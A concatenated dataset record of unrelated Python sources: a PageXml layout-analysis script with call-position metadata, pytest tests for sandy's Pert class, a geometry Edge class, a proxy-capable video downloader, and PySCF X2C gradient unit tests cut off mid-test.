lTextLines = PageXml.getChildByName(doc.getroot(),'TextLine')
for tl in lTextLines:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = tl.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
xpath = "./a:%s" % ("Baseline")
lBL = tl.xpath(xpath,namespaces={"a": self.xmlns})
try:baseline = lBL[0]
except IndexError:continue
sPoints=baseline.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
try:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
except ValueError:print (tl)
#plg = Polygon(lXY)
try: line=LineString(lXY)
except ValueError: continue # LineStrings must have at least 2 coordinate tuples
topline=translate(line,yoff=-20)
#iHeight = 20 # in pixel
#x1,y1, x2,y2 = topline.getBoundingBox()
if coord is not None:
spoints = ' '.join("%s,%s"%(int(x[0]),int(x[1])) for x in line.coords)
lp=list(topline.coords)
lp.reverse()
spoints =spoints+ ' ' +' '.join("%s,%s"%(int(x[0]),int(x[1])) for x in lp)
#spoints = ' '.join("%s,%s"%(x[0],x[1]) for x in pp.coords)
#coord.set('points',"%d,%d %d,%d %d,%d %d,%d" % (x1,y1-iHeight,x2,y1-iHeight,x2,y2,x1,y2))
coord.set('points',spoints)
else:
print (tl)
# print tl
def run(self,doc):
"""
GT from TextRegion
or GT from Table
input mpxml (GT)
delete TextLine
"""
if not (self.bTemplate or self.bBaseLine or self.bSeparator) and self.bRegularTextLine:
self.regularTextLines(doc)
self.writeDom(doc, True)
else:
doc,nbpages = self.performLA(doc)
return doc
if __name__ == "__main__":
# for each document
## find the page where the template is
## store it as template (check borders))
## generate profile for table registration
## (execution)
## create profile for lA
## (execution)
tp = LAProcessor()
#prepare for the parsing of the command line
tp.createCommandLineParser()
tp.add_option("--coldir", dest="coldir", action="store", type="string", help="collection folder")
tp.add_option("--docid", dest="docid", action="store", type="string", help="document id")
tp.add_option("--bl", dest="bBaseline", action="store_true", default=False, help="detect baselines")
# tp.add_option("--region", dest="bRegion", action="store_true", default=False, help="keep Region")
tp.add_option("--tl", dest="bTL", action="store_true", default=False, help="keep textlines")
tp.add_option("--sep", dest="bSeparator", action="store_true", default=False, help="detect separator (graphical lines)")
tp.add_option("--regTL", dest="regTL", action="store_true", default=False, help="generate regular TextLines")
tp.add_option("--form", dest="template", action="store_true", default=False, help="perform template registration")
tp.add_option("--formfile", dest="templatefile", action="store", type='string', default=None,help="use this template file (pagexml) for registration")
#tp.add_option("--form", dest="template", action="store", type="string", help="perform template registration")
#parse the command line
dParams, args = tp.parseCommandLine()
#Now we are back to the normal programmatic mode, we set the componenet parameters
tp.setParams(dParams)
doc = tp.loadDom()
tp.run(doc)
|
[
"os.path.abspath",
"copy.deepcopy",
"os.remove",
"xml_formats.PageXml.PageXml.createPageXmlDocument",
"os.path.basename",
"common.Component.Component.__init__",
"common.Component.Component.setParams",
"os.system",
"util.Polygon.Polygon",
"shapely.geometry.LineString",
"xml_formats.PageXml.PageXml.getChildByName",
"common.trace.traceln",
"xml_formats.PageXml.MultiPageXml.makeMultiPageXml",
"lxml.etree.parse",
"os.path.join",
"os.listdir",
"shapely.affinity.translate"
] |
[((4947, 5048), 'common.Component.Component.__init__', 'Component.Component.__init__', (['self', '"""tableProcessor"""', 'self.usage', 'self.version', 'self.description'], {}), "(self, 'tableProcessor', self.usage, self.\n version, self.description)\n", (4975, 5048), True, 'import common.Component as Component\n'), ((5678, 5722), 'common.Component.Component.setParams', 'Component.Component.setParams', (['self', 'dParams'], {}), '(self, dParams)\n', (5707, 5722), True, 'import common.Component as Component\n'), ((12169, 12215), 'xml_formats.PageXml.PageXml.createPageXmlDocument', 'PageXml.createPageXmlDocument', (['"""NLE"""', '""""""', '(0)', '(0)'], {}), "('NLE', '', 0, 0)\n", (12198, 12215), False, 'from xml_formats.PageXml import PageXml\n'), ((12530, 12550), 'copy.deepcopy', 'deepcopy', (['firstTable'], {}), '(firstTable)\n', (12538, 12550), False, 'from copy import deepcopy\n'), ((12731, 12789), 'os.path.abspath', 'os.path.abspath', (["('./%s/col/%s' % (self.coldir, self.docid))"], {}), "('./%s/col/%s' % (self.coldir, self.docid))\n", (12746, 12789), False, 'import sys, os\n'), ((13461, 13519), 'os.path.abspath', 'os.path.abspath', (["('./%s/col/%s' % (self.coldir, self.docid))"], {}), "('./%s/col/%s' % (self.coldir, self.docid))\n", (13476, 13519), False, 'import sys, os\n'), ((14141, 14199), 'os.path.abspath', 'os.path.abspath', (["('./%s/col/%s' % (self.coldir, self.docid))"], {}), "('./%s/col/%s' % (self.coldir, self.docid))\n", (14156, 14199), False, 'import sys, os\n'), ((14827, 14881), 'os.path.join', 'os.path.join', (["(self.coldir + os.sep + 'col')", 'self.docid'], {}), "(self.coldir + os.sep + 'col', self.docid)\n", (14839, 14881), False, 'import sys, os\n'), ((14900, 14937), 'xml_formats.PageXml.MultiPageXml.makeMultiPageXml', 'MultiPageXml.makeMultiPageXml', (['lFiles'], {}), '(lFiles)\n', (14929, 14937), False, 'from xml_formats.PageXml import MultiPageXml\n'), ((15511, 15596), 'os.path.abspath', 'os.path.abspath', (["('%s%s%s%s%s' % (self.coldir, os.sep, 'col', os.sep, self.docid))"], {}), "('%s%s%s%s%s' % (self.coldir, os.sep, 'col', os.sep, self.docid)\n )\n", (15526, 15596), False, 'import sys, os\n'), ((434, 462), 'os.path.abspath', 'os.path.abspath', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (449, 462), False, 'import sys, os\n'), ((9678, 9719), 'xml_formats.PageXml.PageXml.getChildByName', 'PageXml.getChildByName', (['page', '"""TableCell"""'], {}), "(page, 'TableCell')\n", (9700, 9719), False, 'from xml_formats.PageXml import PageXml\n'), ((12814, 12846), 'os.path.join', 'os.path.join', (['localpath', '"""*.jpg"""'], {}), "(localpath, '*.jpg')\n", (12826, 12846), False, 'import sys, os\n'), ((13544, 13576), 'os.path.join', 'os.path.join', (['localpath', '"""*.jpg"""'], {}), "(localpath, '*.jpg')\n", (13556, 13576), False, 'import sys, os\n'), ((14224, 14256), 'os.path.join', 'os.path.join', (['localpath', '"""*.jpg"""'], {}), "(localpath, '*.jpg')\n", (14236, 14256), False, 'import sys, os\n'), ((18978, 18992), 'os.system', 'os.system', (['job'], {}), '(job)\n', (18987, 18992), False, 'import sys, os\n'), ((19005, 19060), 'common.trace.traceln', 'traceln', (["('table registration done: %s' % prnregfilename)"], {}), "('table registration done: %s' % prnregfilename)\n", (19012, 19060), False, 'from common.trace import traceln\n'), ((19284, 19298), 'os.system', 'os.system', (['job'], {}), '(job)\n', (19293, 19298), False, 'import sys, os\n'), ((19311, 19349), 'common.trace.traceln', 'traceln', (["('GL done: %s' % prnglfilename)"], {}), "('GL done: %s' % 
prnglfilename)\n", (19318, 19349), False, 'from common.trace import traceln\n'), ((19628, 19642), 'os.system', 'os.system', (['job'], {}), '(job)\n', (19637, 19642), False, 'import sys, os\n'), ((19655, 19693), 'common.trace.traceln', 'traceln', (["('LA done: %s' % prnlafilename)"], {}), "('LA done: %s' % prnlafilename)\n", (19662, 19693), False, 'from common.trace import traceln\n'), ((21360, 21372), 'util.Polygon.Polygon', 'Polygon', (['lXY'], {}), '(lXY)\n', (21367, 21372), False, 'from util.Polygon import Polygon\n'), ((21390, 21405), 'shapely.geometry.LineString', 'LineString', (['lXY'], {}), '(lXY)\n', (21400, 21405), False, 'from shapely.geometry import LineString\n'), ((23025, 23050), 'shapely.affinity.translate', 'translate', (['line'], {'yoff': '(-20)'}), '(line, yoff=-20)\n', (23034, 23050), False, 'from shapely.affinity import translate\n'), ((9555, 9595), 'xml_formats.PageXml.PageXml.getChildByName', 'PageXml.getChildByName', (['page', '"""TextLine"""'], {}), "(page, 'TextLine')\n", (9577, 9595), False, 'from xml_formats.PageXml import PageXml\n'), ((10299, 10311), 'util.Polygon.Polygon', 'Polygon', (['lXY'], {}), '(lXY)\n', (10306, 10311), False, 'from util.Polygon import Polygon\n'), ((10914, 10926), 'util.Polygon.Polygon', 'Polygon', (['lXY'], {}), '(lXY)\n', (10921, 10926), False, 'from util.Polygon import Polygon\n'), ((16507, 16551), 'os.path.join', 'os.path.join', (['self.coldir', '"""col"""', 'self.docid'], {}), "(self.coldir, 'col', self.docid)\n", (16519, 16551), False, 'import sys, os\n'), ((22895, 22910), 'shapely.geometry.LineString', 'LineString', (['lXY'], {}), '(lXY)\n', (22905, 22910), False, 'from shapely.geometry import LineString\n'), ((16634, 16653), 'os.listdir', 'os.listdir', (['xmlpath'], {}), '(xmlpath)\n', (16644, 16653), False, 'import sys, os\n'), ((16779, 16824), 'os.remove', 'os.remove', (["('%s%s%s' % (xmlpath, os.sep, name))"], {}), "('%s%s%s' % (xmlpath, os.sep, name))\n", (16788, 16824), False, 'import sys, os\n'), ((17197, 17216), 'os.listdir', 'os.listdir', (['xmlpath'], {}), '(xmlpath)\n', (17207, 17216), False, 'import sys, os\n'), ((17567, 17587), 'lxml.etree.parse', 'etree.parse', (['oldname'], {}), '(oldname)\n', (17578, 17587), False, 'from lxml import etree\n'), ((17901, 17941), 'xml_formats.PageXml.PageXml.getChildByName', 'PageXml.getChildByName', (['page', '"""TextLine"""'], {}), "(page, 'TextLine')\n", (17923, 17941), False, 'from xml_formats.PageXml import PageXml\n'), ((18158, 18217), 'common.trace.traceln', 'traceln', (["('No table found in this document: %s' % self.docid)"], {}), "('No table found in this document: %s' % self.docid)\n", (18165, 18217), False, 'from common.trace import traceln\n'), ((13031, 13068), 'os.path.abspath', 'os.path.abspath', (["('%s' % sTemplatefile)"], {}), "('%s' % sTemplatefile)\n", (13046, 13068), False, 'import sys, os\n'), ((16833, 16852), 'os.listdir', 'os.listdir', (['xmlpath'], {}), '(xmlpath)\n', (16843, 16852), False, 'import sys, os\n'), ((16982, 17001), 'os.listdir', 'os.listdir', (['xmlpath'], {}), '(xmlpath)\n', (16992, 17001), False, 'import sys, os\n'), ((16657, 16679), 'os.path.basename', 'os.path.basename', (['name'], {}), '(name)\n', (16673, 16679), False, 'import sys, os\n'), ((17220, 17242), 'os.path.basename', 'os.path.basename', (['name'], {}), '(name)\n', (17236, 17242), False, 'import sys, os\n'), ((16856, 16878), 'os.path.basename', 'os.path.basename', (['name'], {}), '(name)\n', (16872, 16878), False, 'import sys, os\n'), ((17005, 17027), 'os.path.basename', 
'os.path.basename', (['name'], {}), '(name)\n', (17021, 17027), False, 'import sys, os\n')]
|
import pytest
from io import StringIO
import numpy as np
import pandas as pd
import sandy
__author__ = "<NAME>"
#####################
# Test initialization
#####################
def test_from_file_1_column():
vals = '1\n5\n9'
file = StringIO(vals)
with pytest.raises(Exception):
sandy.Pert.from_file(file)
def test_from_file_non_monotonic():
vals = '1 1\n6 5\n5 2\n9 3'
file = StringIO(vals)
with pytest.raises(Exception):
sandy.Pert.from_file(file)
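# module-scoped fixture: a three-column perturbation file parsed once and shared by the tests below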
@pytest.fixture(scope="module")
def pert3():
vals = '1 1 5\n5 2 1\n9 3 1'
file = StringIO(vals)
return sandy.Pert.from_file(file)
def test_from_file_3_columns(pert3):
# should try and catch the warning
pass
def test_init_with_series(pert3):
pert = sandy.Pert(pert3.right)
assert pert.data.equals(pert3.data)
def test_init_with_dataframe(pert3):
with pytest.raises(Exception):
sandy.Pert(pert3.right.to_frame())
def test_init_with_intervalindex(pert3):
pert = sandy.Pert(pert3.data)
assert pert.data.equals(pert3.data)
################################
# Test initialization attributes
################################
def test_Pert_type(pert3):
assert isinstance(pert3, sandy.Pert)
def test_Pert_data_index_type(pert3):
assert isinstance(pert3.data.index, pd.IntervalIndex)
def test_Pert_data_index_right_values(pert3):
assert pert3.data.index.right.tolist() == [1, 5, 9]
def test_Pert_data_index_left_values(pert3):
assert pert3.data.index.left.tolist() == [0, 1, 5]
def test_Pert_data_index_float(pert3):
assert pert3.data.index.right.values.dtype == float
def test_Pert_data_values(pert3):
np.testing.assert_array_equal(pert3.data.values, [1,2,3])
def test_Pert_data_values_float(pert3):
assert pert3.data.values.dtype == float
########################
# Test attributes
########################
########################
# Test methods
########################
# def test_Spectrum_selfreshape(spec_const):
# S = spec_const.reshape(spec_const.right.index)
# assert np.allclose(S.data.values,spec_const.data.values)
# @pytest.mark.parametrize("eg, flux",
# [
# ([30], 500),
# ([6e-12], 0.6),
# ([5e-12], 0.5),
# ([4e-12], 0.4),
# ([1e-11], 1),
# ([18.896380829766173], 499),
# ([1e-10, 1e-9, 1e-8, 1e-7, 1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1e0, 1e1, 20], 500),
# ]
# )
# def test_Spectrum_reshape(spec_const, eg, flux):
# S = spec_const.reshape(eg)
# assert S.right.index.tolist() == eg
# assert S.flux == pytest.approx(flux)
# @pytest.mark.parametrize("eg, err, errtype",
# [
# ([2, 1], True, ValueError),
# ([2, 2], False, None),
# ([-1, 2], True, ValueError),
# ]
# )
# def test_Spectrum_reshape_error(spec_const, eg, err, errtype):
# if err:
# with pytest.raises(errtype):
# spec_const.reshape(eg)
# else:
# spec_const.reshape(eg)
|
[
"sandy.Pert",
"io.StringIO",
"sandy.Pert.from_file",
"numpy.testing.assert_array_equal",
"pytest.fixture",
"pytest.raises"
] |
[((526, 556), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (540, 556), False, 'import pytest\n'), ((260, 274), 'io.StringIO', 'StringIO', (['vals'], {}), '(vals)\n', (268, 274), False, 'from io import StringIO\n'), ((435, 449), 'io.StringIO', 'StringIO', (['vals'], {}), '(vals)\n', (443, 449), False, 'from io import StringIO\n'), ((623, 637), 'io.StringIO', 'StringIO', (['vals'], {}), '(vals)\n', (631, 637), False, 'from io import StringIO\n'), ((650, 676), 'sandy.Pert.from_file', 'sandy.Pert.from_file', (['file'], {}), '(file)\n', (670, 676), False, 'import sandy\n'), ((816, 839), 'sandy.Pert', 'sandy.Pert', (['pert3.right'], {}), '(pert3.right)\n', (826, 839), False, 'import sandy\n'), ((1057, 1079), 'sandy.Pert', 'sandy.Pert', (['pert3.data'], {}), '(pert3.data)\n', (1067, 1079), False, 'import sandy\n'), ((1748, 1807), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['pert3.data.values', '[1, 2, 3]'], {}), '(pert3.data.values, [1, 2, 3])\n', (1777, 1807), True, 'import numpy as np\n'), ((285, 309), 'pytest.raises', 'pytest.raises', (['Exception'], {}), '(Exception)\n', (298, 309), False, 'import pytest\n'), ((320, 346), 'sandy.Pert.from_file', 'sandy.Pert.from_file', (['file'], {}), '(file)\n', (340, 346), False, 'import sandy\n'), ((460, 484), 'pytest.raises', 'pytest.raises', (['Exception'], {}), '(Exception)\n', (473, 484), False, 'import pytest\n'), ((495, 521), 'sandy.Pert.from_file', 'sandy.Pert.from_file', (['file'], {}), '(file)\n', (515, 521), False, 'import sandy\n'), ((931, 955), 'pytest.raises', 'pytest.raises', (['Exception'], {}), '(Exception)\n', (944, 955), False, 'import pytest\n')]
|
from ground.base import (Context,
Orientation)
from ground.hints import Point
from reprit.base import generate_repr
class Edge:
@classmethod
def from_endpoints(cls,
left: Point,
right: Point,
interior_to_left: bool,
context: Context) -> 'Edge':
"""Constructs edge given its endpoints."""
return cls(left, right, interior_to_left, context)
__slots__ = 'context', 'interior_to_left', 'left', 'right'
def __init__(self,
left: Point,
right: Point,
interior_to_left: bool,
context: Context) -> None:
assert left < right, 'Incorrect endpoints order'
self.context, self.interior_to_left, self.left, self.right = (
context, interior_to_left, left, right)
def __lt__(self, other: 'Edge') -> bool:
"""Checks if the edge is lower than the other."""
other_left_orientation = self.orientation_of(other.left)
other_right_orientation = self.orientation_of(other.right)
if other_left_orientation is other_right_orientation:
return other_left_orientation is Orientation.COUNTERCLOCKWISE
elif other_left_orientation is Orientation.COLLINEAR:
return other_right_orientation is Orientation.COUNTERCLOCKWISE
left_orientation = other.orientation_of(self.left)
right_orientation = other.orientation_of(self.right)
if left_orientation is right_orientation:
return left_orientation is Orientation.CLOCKWISE
elif left_orientation is Orientation.COLLINEAR:
return right_orientation is Orientation.CLOCKWISE
elif other_right_orientation is Orientation.COLLINEAR:
return other_left_orientation is Orientation.COUNTERCLOCKWISE
else:
return (left_orientation is Orientation.CLOCKWISE
if right_orientation is Orientation.COLLINEAR
# crossing edges are incomparable
else NotImplemented)
__repr__ = generate_repr(__init__)
def orientation_of(self, point: Point) -> Orientation:
"""Returns orientation of the point relative to the edge."""
return self.context.angle_orientation(self.left, self.right, point)
|
[
"reprit.base.generate_repr"
] |
[((2144, 2167), 'reprit.base.generate_repr', 'generate_repr', (['__init__'], {}), '(__init__)\n', (2157, 2167), False, 'from reprit.base import generate_repr\n')]
|
from mtdownloader import MTDownloader
from mtdownloader import readable as readableSize
from phuburl import resolver as PageResolver
import requests
import json
import time
def readableTime(s):
s=int(s)
if(s<60):
return '{}s'.format(s)
elif(s<3600):
return '{}m{}s'.format(s//60,s%60)
else:
return '{}h{}m{}s'.format(s//3600,(s%3600)//60,s%60)
def readConfig():
try:
with open('config.json') as f:
config=json.loads(f.read())
return config
except FileNotFoundError:
print('Unable to read config.')
return None
def setupConfig():
print('Welcome to PHDownloader config setup.')
config={}
    ans=input('Use proxy? (Y/n): ')
    if(ans=='' or ans.lower()=='y'):
        config["useProxy"]=True
        config["proxy"]={}
        ans=input('http proxy (http://127.0.0.1:1080): ')
        if(ans!=''):
            config["proxy"]["http"]=ans
        else:
            config["proxy"]["http"]='http://127.0.0.1:1080'
        ans=input('https proxy (https://127.0.0.1:1080): ')
        if(ans!=''):
            config["proxy"]["https"]=ans
        else:
            config["proxy"]["https"]='https://127.0.0.1:1080'
    else:
        config["useProxy"]=False
        config["proxy"]={"http":"http://127.0.0.1:1080","https":"https://127.0.0.1:1080"}
    ans=input("Use timeout? (None): ")
    if(ans=='' or ans.lower()=='none'):
        config["timeout"]=None
    else:
        config["timeout"]=int(ans)
    ans=input("Use debug? (y/N): ")
    if(ans=='' or ans.lower()=='n'):
        config["debug"]=False
    else:
        config["debug"]=True
    ans=input("Allow overwrite? (y/N): ")
    if(ans=='' or ans.lower()=='n'):
        config["overwrite"]=False
    else:
        config["overwrite"]=True
with open('config.json','w') as f:
f.write(json.dumps(config,indent=4))
print('Config saved to `config.json`')
return config
if __name__ == "__main__":
config=readConfig()
if(config is None):
config=setupConfig()
if(config["useProxy"]):
theProxy=config["proxy"]
else:
theProxy=None
while True:
try:
url=input('Please input URL: ')
except EOFError:
break
try:
print('[BEGIN] {}'.format(url))
res=requests.get(url,proxies=theProxy)
info=PageResolver(res.text)
print(info)
downloader=MTDownloader(info['url'],filename=info['name'],overwrite=config["overwrite"],timeout=config["timeout"],proxy=theProxy,debug=config["debug"])
time_before=time.time()
downloader.start()
downloader.wait()
time_diff=time.time()-time_before
print('[DONE] {} ({} in {} at {})'.format(info["name"],
readableSize(downloader.length),readableTime(time_diff),
'{}/s'.format(readableSize(downloader.length/time_diff))))
except Exception as e:
print('[Error] {}'.format(e))
|
[
"json.dumps",
"time.time",
"requests.get",
"mtdownloader.MTDownloader",
"mtdownloader.readable",
"phuburl.resolver"
] |
[((1864, 1892), 'json.dumps', 'json.dumps', (['config'], {'indent': '(4)'}), '(config, indent=4)\n', (1874, 1892), False, 'import json\n'), ((2345, 2380), 'requests.get', 'requests.get', (['url'], {'proxies': 'theProxy'}), '(url, proxies=theProxy)\n', (2357, 2380), False, 'import requests\n'), ((2397, 2419), 'phuburl.resolver', 'PageResolver', (['res.text'], {}), '(res.text)\n', (2409, 2419), True, 'from phuburl import resolver as PageResolver\n'), ((2467, 2622), 'mtdownloader.MTDownloader', 'MTDownloader', (["info['url']"], {'filename': "info['name']", 'overwrite': "config['overwrite']", 'timeout': "config['timeout']", 'proxy': 'theProxy', 'debug': "config['debug']"}), "(info['url'], filename=info['name'], overwrite=config[\n 'overwrite'], timeout=config['timeout'], proxy=theProxy, debug=config[\n 'debug'])\n", (2479, 2622), False, 'from mtdownloader import MTDownloader\n'), ((2632, 2643), 'time.time', 'time.time', ([], {}), '()\n', (2641, 2643), False, 'import time\n'), ((2727, 2738), 'time.time', 'time.time', ([], {}), '()\n', (2736, 2738), False, 'import time\n'), ((2835, 2866), 'mtdownloader.readable', 'readableSize', (['downloader.length'], {}), '(downloader.length)\n', (2847, 2866), True, 'from mtdownloader import readable as readableSize\n'), ((2922, 2965), 'mtdownloader.readable', 'readableSize', (['(downloader.length / time_diff)'], {}), '(downloader.length / time_diff)\n', (2934, 2965), True, 'from mtdownloader import readable as readableSize\n')]
|
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import reduce
import unittest
import numpy
import scipy.linalg
from pyscf import lib
from pyscf import gto
from pyscf.x2c import sfx2c1e
from pyscf.x2c import sfx2c1e_grad
def _sqrt0(a):
w, v = scipy.linalg.eigh(a)
return numpy.dot(v*numpy.sqrt(w), v.conj().T)
def _invsqrt0(a):
w, v = scipy.linalg.eigh(a)
return numpy.dot(v/numpy.sqrt(w), v.conj().T)
def _sqrt1(a0, a1):
'''Solving first order of x^2 = a'''
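    # In the eigenbasis of a0 the condition x0 @ x1 + x1 @ x0 = a1 decouples
    # elementwise: (x1)_ij = (a1)_ij / (w_i + w_j), with w_i = sqrt(eig_i(a0)).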
w, v = scipy.linalg.eigh(a0)
w = numpy.sqrt(w)
a1 = reduce(numpy.dot, (v.conj().T, a1, v))
x1 = a1 / (w[:,None] + w)
x1 = reduce(numpy.dot, (v, x1, v.conj().T))
return x1
def _invsqrt1(a0, a1):
'''Solving first order of x^2 = a^{-1}'''
w, v = scipy.linalg.eigh(a0)
w = 1./numpy.sqrt(w)
a1 = -reduce(numpy.dot, (v.conj().T, a1, v))
x1 = numpy.einsum('i,ij,j->ij', w**2, a1, w**2) / (w[:,None] + w)
x1 = reduce(numpy.dot, (v, x1, v.conj().T))
return x1
def get_R(mol):
s0 = mol.intor('int1e_ovlp')
t0 = mol.intor('int1e_kin')
s0sqrt = _sqrt0(s0)
s0invsqrt = _invsqrt0(s0)
x0 = get_x0(mol)
c = lib.param.LIGHT_SPEED
stild = s0 + reduce(numpy.dot, (x0.T, t0*(.5/c**2), x0))
R = _invsqrt0(reduce(numpy.dot, (s0invsqrt, stild, s0invsqrt)))
R = reduce(numpy.dot, (s0invsqrt, R, s0sqrt))
return R
def get_r1(mol, atm_id, pos):
# See JCP 135 084114, Eq (34)
c = lib.param.LIGHT_SPEED
aoslices = mol.aoslice_by_atom()
ish0, ish1, p0, p1 = aoslices[atm_id]
s0 = mol.intor('int1e_ovlp')
t0 = mol.intor('int1e_kin')
s1all = mol.intor('int1e_ipovlp', comp=3)
t1all = mol.intor('int1e_ipkin', comp=3)
s1 = numpy.zeros_like(s0)
t1 = numpy.zeros_like(t0)
s1[p0:p1,:] =-s1all[pos][p0:p1]
s1[:,p0:p1] -= s1all[pos][p0:p1].T
t1[p0:p1,:] =-t1all[pos][p0:p1]
t1[:,p0:p1] -= t1all[pos][p0:p1].T
x0 = get_x0(mol)
x1 = get_x1(mol, atm_id)[pos]
sa0 = s0 + reduce(numpy.dot, (x0.T, t0*(.5/c**2), x0))
sa1 = s1 + reduce(numpy.dot, (x0.T, t1*(.5/c**2), x0))
sa1+= reduce(numpy.dot, (x1.T, t0*(.5/c**2), x0))
sa1+= reduce(numpy.dot, (x0.T, t0*(.5/c**2), x1))
s0_sqrt = _sqrt0(s0)
s0_invsqrt = _invsqrt0(s0)
s1_sqrt = _sqrt1(s0, s1)
s1_invsqrt = _invsqrt1(s0, s1)
R0_part = reduce(numpy.dot, (s0_invsqrt, sa0, s0_invsqrt))
R1_part = (reduce(numpy.dot, (s0_invsqrt, sa1, s0_invsqrt)) +
reduce(numpy.dot, (s1_invsqrt, sa0, s0_invsqrt)) +
reduce(numpy.dot, (s0_invsqrt, sa0, s1_invsqrt)))
R1 = reduce(numpy.dot, (s0_invsqrt, _invsqrt1(R0_part, R1_part), s0_sqrt))
R1 += reduce(numpy.dot, (s1_invsqrt, _invsqrt0(R0_part), s0_sqrt))
R1 += reduce(numpy.dot, (s0_invsqrt, _invsqrt0(R0_part), s1_sqrt))
return R1
def get_h0_s0(mol):
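    # Build the spin-free one-electron Dirac Hamiltonian h and metric m in the
    # two-component (large, small) block representation used by X2C.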
s = mol.intor_symmetric('int1e_ovlp')
t = mol.intor_symmetric('int1e_kin')
v = mol.intor_symmetric('int1e_nuc')
w = mol.intor_symmetric('int1e_pnucp')
nao = s.shape[0]
n2 = nao * 2
h = numpy.zeros((n2,n2), dtype=v.dtype)
m = numpy.zeros((n2,n2), dtype=v.dtype)
c = lib.param.LIGHT_SPEED
h[:nao,:nao] = v
h[:nao,nao:] = t
h[nao:,:nao] = t
h[nao:,nao:] = w * (.25/c**2) - t
m[:nao,:nao] = s
m[nao:,nao:] = t * (.5/c**2)
return h, m
def get_h1_s1(mol, ia):
aoslices = mol.aoslice_by_atom()
    ish0, ish1, p0, p1 = aoslices[ia]
nao = mol.nao_nr()
s1 = mol.intor('int1e_ipovlp', comp=3)
t1 = mol.intor('int1e_ipkin', comp=3)
v1 = mol.intor('int1e_ipnuc', comp=3)
w1 = mol.intor('int1e_ipspnucsp', comp=12).reshape(3,4,nao,nao)[:,3]
with mol.with_rinv_origin(mol.atom_coord(ia)):
rinv1 = -8*mol.intor('int1e_iprinv', comp=3)
prinvp1 = -8*mol.intor('int1e_ipsprinvsp', comp=12).reshape(3,4,nao,nao)[:,3]
n2 = nao * 2
h = numpy.zeros((3,n2,n2), dtype=v1.dtype)
m = numpy.zeros((3,n2,n2), dtype=v1.dtype)
rinv1[:,p0:p1,:] -= v1[:,p0:p1]
rinv1 = rinv1 + rinv1.transpose(0,2,1).conj()
prinvp1[:,p0:p1,:] -= w1[:,p0:p1]
prinvp1 = prinvp1 + prinvp1.transpose(0,2,1).conj()
s1ao = numpy.zeros_like(s1)
t1ao = numpy.zeros_like(t1)
s1ao[:,p0:p1,:] = -s1[:,p0:p1]
s1ao[:,:,p0:p1]+= -s1[:,p0:p1].transpose(0,2,1)
t1ao[:,p0:p1,:] = -t1[:,p0:p1]
t1ao[:,:,p0:p1]+= -t1[:,p0:p1].transpose(0,2,1)
c = lib.param.LIGHT_SPEED
h[:,:nao,:nao] = rinv1
h[:,:nao,nao:] = t1ao
h[:,nao:,:nao] = t1ao
h[:,nao:,nao:] = prinvp1 * (.25/c**2) - t1ao
m[:,:nao,:nao] = s1ao
m[:,nao:,nao:] = t1ao * (.5/c**2)
return h, m
def get_x0(mol):
c = lib.param.LIGHT_SPEED
h0, s0 = get_h0_s0(mol)
e, c = scipy.linalg.eigh(h0, s0)
nao = mol.nao_nr()
cl = c[:nao,nao:]
cs = c[nao:,nao:]
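    # Decoupling matrix X = Cs @ Cl^{-1}, obtained by solving Cl.T @ X.T = Cs.T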
x0 = scipy.linalg.solve(cl.T, cs.T).T
return x0
def get_x1(mol, ia):
h0, s0 = get_h0_s0(mol)
h1, s1 = get_h1_s1(mol, ia)
e0, c0 = scipy.linalg.eigh(h0, s0)
nao = mol.nao_nr()
cl0 = c0[:nao,nao:]
cs0 = c0[nao:,nao:]
x0 = scipy.linalg.solve(cl0.T, cs0.T).T
h1 = numpy.einsum('pi,xpq,qj->xij', c0.conj(), h1, c0[:,nao:])
s1 = numpy.einsum('pi,xpq,qj->xij', c0.conj(), s1, c0[:,nao:])
epi = e0[:,None] - e0[nao:]
degen_mask = abs(epi) < 1e-7
epi[degen_mask] = 1e200
c1 = (h1 - s1 * e0[nao:]) / -epi
c1[:,degen_mask] = -.5 * s1[:,degen_mask]
c1 = numpy.einsum('pq,xqi->xpi', c0, c1)
cl1 = c1[:,:nao]
cs1 = c1[:,nao:]
x1 = [scipy.linalg.solve(cl0.T, (cs1[i] - x0.dot(cl1[i])).T).T
for i in range(3)]
return numpy.asarray(x1)
mol1 = gto.M(
verbose = 0,
atom = [["O" , (0. , 0. , 0.0001)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]],
basis = '3-21g',
)
mol2 = gto.M(
verbose = 0,
atom = [["O" , (0. , 0. ,-0.0001)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]],
basis = '3-21g',
)
mol = gto.M(
verbose = 0,
atom = [["O" , (0. , 0. , 0. )],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]],
basis = '3-21g',
)
class KnownValues(unittest.TestCase):
def test_x1(self):
with lib.light_speed(10) as c:
x_1 = get_x0(mol1)
x_2 = get_x0(mol2)
x1_ref = (x_1 - x_2) / 0.0002 * lib.param.BOHR
x1t = get_x1(mol, 0)
self.assertAlmostEqual(abs(x1t[2]-x1_ref).max(), 0, 7)
x0 = get_x0(mol)
h0, s0 = get_h0_s0(mol)
e0, c0 = scipy.linalg.eigh(h0, s0)
get_h1_etc = sfx2c1e_grad._gen_first_order_quantities(mol, e0, c0, x0)
x1 = get_h1_etc(0)[4]
self.assertAlmostEqual(abs(x1-x1t).max(), 0, 9)
def test_R1(self):
with lib.light_speed(10) as c:
R_1 = get_R(mol1)
R_2 = get_R(mol2)
R1_ref = (R_1 - R_2) / 0.0002 * lib.param.BOHR
R1t = get_r1(mol, 0, 2)
self.assertAlmostEqual(abs(R1t-R1_ref).max(), 0, 7)
x0 = get_x0(mol)
h0, s0 = get_h0_s0(mol)
